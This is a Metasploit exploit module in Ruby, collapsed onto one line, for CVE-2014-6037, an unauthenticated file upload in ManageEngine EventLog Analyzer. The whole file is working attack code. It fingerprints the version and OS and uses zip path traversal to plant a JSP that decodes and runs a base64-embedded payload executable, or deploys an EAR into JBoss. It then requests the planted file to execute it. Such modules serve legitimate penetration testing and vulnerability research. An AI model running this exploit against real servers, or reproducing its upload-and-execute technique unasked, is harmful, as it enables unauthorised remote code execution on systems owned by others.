## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'ManageEngine Eventlog Analyzer Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in ManageEngine Eventlog Analyzer. The vulnerability exists in the agentUpload servlet which accepts unauthenticated file uploads and handles zip file contents in an insecure way. By combining both weaknesses a remote attacker can achieve remote code execution. This module has been tested successfully on versions v7.0 - v9.9 b9002 in Windows and Linux. Versions between 7.0 and < 8.1 are only exploitable via EAR deployment in the JBoss server, while versions 8.1+ are only exploitable via a JSP upload. }, 'Author' => [ 'h0ng10', # Vulnerability discovery 'Pedro Ribeiro ' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2014-6037' ], [ 'OSVDB', '110642' ], [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2014-01.txt' ], [ 'URL', 'https://seclists.org/fulldisclosure/2014/Aug/86' ] ], 'DefaultOptions' => { 'WfsDelay' => 5 }, 'Privileged' => false, # Privileged on Windows but not on Linux targets 'Platform' => %w{ java linux win }, 'Targets' => [ [ 'Automatic', { } ], [ 'Eventlog Analyzer v7.0 - v8.0 / Java universal', { 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'WfsDelay' => 30 } ], [ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], [ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2014-08-31')) register_options( [ Opt::RPORT(8400), OptInt.new('SLEEP', [true, 'Seconds to sleep while we wait for EAR deployment (Java target only)', 15]), ]) end def get_version res = send_request_cgi({ 'uri' => normalize_uri("event/index3.do"), 'method' => 'GET' }) if res and res.code == 200 if res.body =~ /ManageEngine EventLog Analyzer ([0-9]{1})/ return $1 end end return "0" end def check version = get_version if version >= "7" and version <= "9" # version 7 to < 8.1 detection res = send_request_cgi({ 'uri' => normalize_uri("event/agentUpload"), 'method' => 'GET' }) if res and res.code == 405 return Exploit::CheckCode::Appears end # version 8.1+ detection res = send_request_cgi({ 'uri' => normalize_uri("agentUpload"), 'method' => 'GET' }) if res and res.code == 405 and version == 8 return Exploit::CheckCode::Appears else # We can't be sure that it is vulnerable in version 9 return Exploit::CheckCode::Detected end else return Exploit::CheckCode::Safe end end def create_zip_and_upload(payload, target_path, is_payload = true) # Zipping with CM_STORE to avoid errors decompressing the zip # in the Java vulnerable application zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) zip.add_file(target_path, payload) post_data = Rex::MIME::Message.new post_data.add_part(zip.pack, "application/zip", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"") data = post_data.to_s if is_payload print_status("Uploading payload...") end res = send_request_cgi({ 'uri' => (@my_target == targets[1] ? normalize_uri("/event/agentUpload") : normalize_uri("agentUpload")), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" }) if res and res.code == 200 and res.body.empty? if is_payload print_good("Payload uploaded successfully") end register_files_for_cleanup(target_path.gsub("../../", "../")) return true else return false end end def pick_target return target if target.name != 'Automatic' print_status("Determining target") version = get_version if version == "7" return targets[1] end os_finder_payload = %Q{<%out.println(System.getProperty("os.name"));%>} jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" target_dir = "../../webapps/event/" if not create_zip_and_upload(os_finder_payload, target_dir + jsp_name, false) if version == "8" # Versions < 8.1 do not have a Java compiler, but can be exploited via the EAR method return targets[1] end return nil end res = send_request_cgi({ 'uri' => normalize_uri(jsp_name), 'method' => 'GET' }) if res and res.code == 200 if res.body.to_s =~ /Windows/ return targets[2] else # assuming Linux return targets[3] end end return nil end def generate_jsp_payload opts = {:arch => @my_target.arch, :platform => @my_target.platform} payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch) exe = generate_payload_exe(opts) base64_exe = Rex::Text.encode_base64(exe) native_payload_name = rand_text_alpha(rand(6)+3) ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin' var_raw = rand_text_alpha(rand(8) + 3) var_ostream = rand_text_alpha(rand(8) + 3) var_buf = rand_text_alpha(rand(8) + 3) var_decoder = rand_text_alpha(rand(8) + 3) var_tmp = rand_text_alpha(rand(8) + 3) var_path = rand_text_alpha(rand(8) + 3) var_proc2 = rand_text_alpha(rand(8) + 3) if @my_target['Platform'] == 'linux' var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3) chmod = %Q| Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path}); Thread.sleep(200); | var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3) cleanup = %Q| Thread.sleep(200); Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path}); | else chmod = '' cleanup = '' end jsp = %Q| <%@page import="java.io.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% try { String #{var_buf} = "#{base64_exe}"; BASE64Decoder #{var_decoder} = new BASE64Decoder(); byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}"); String #{var_path} = #{var_tmp}.getAbsolutePath(); BufferedOutputStream #{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); #{var_ostream}.write(#{var_raw}); #{var_ostream}.close(); #{chmod} Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); #{cleanup} } catch (Exception e) { } %> | jsp = jsp.gsub(/\n/, '') jsp = jsp.gsub(/\t/, '') jsp = jsp.gsub(/\x0d\x0a/, "") jsp = jsp.gsub(/\x0a/, "") return jsp end def exploit_native # When using auto targeting, MSF selects the Windows meterpreter as the default payload. # Fail if this is the case and ask the user to select an appropriate payload. if @my_target['Platform'] == 'linux' and payload_instance.name =~ /Windows/ fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.") end jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" target_dir = "../../webapps/event/" jsp_payload = generate_jsp_payload if not create_zip_and_upload(jsp_payload, target_dir + jsp_name) fail_with(Failure::Unknown, "#{peer} - Payload upload failed") end return jsp_name end def exploit_java # When using auto targeting, MSF selects the Windows meterpreter as the default payload. # Fail if this is the case and ask the user to select an appropriate payload. if @my_target['Platform'] == 'java' and not payload_instance.name =~ /Java/ fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Java target.") end target_dir = "../../server/default/deploy/" # First we generate the WAR with the payload... war_app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => war_app_base }) # ... and then we create an EAR file that will contain it. ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4)) app_xml = %Q{#{rand_text_alphanumeric(4 + rand(32 - 4))}#{war_app_base + ".war"}/#{ear_app_base}} # Zipping with CM_STORE to avoid errors while decompressing the zip # in the Java vulnerable application ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) ear_file.add_file(war_app_base + ".war", war_payload.to_s) ear_file.add_file("META-INF/application.xml", app_xml) ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + ".ear" if not create_zip_and_upload(ear_file.pack, target_dir + ear_file_name) fail_with(Failure::Unknown, "#{peer} - Payload upload failed") end print_status("Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...") sleep(datastore['SLEEP']) return normalize_uri(ear_app_base, war_app_base, rand_text_alphanumeric(4 + rand(32 - 4))) end def exploit if datastore['SLEEP'] < 0 print_error("The SLEEP datastore option shouldn't be negative") return end @my_target = pick_target if @my_target.nil? print_error("Unable to select a target, we must bail.") return else print_status("Selected target #{@my_target.name}") end if @my_target == targets[1] exploit_path = exploit_java else exploit_path = exploit_native end print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(exploit_path), 'method' => 'GET' }) end end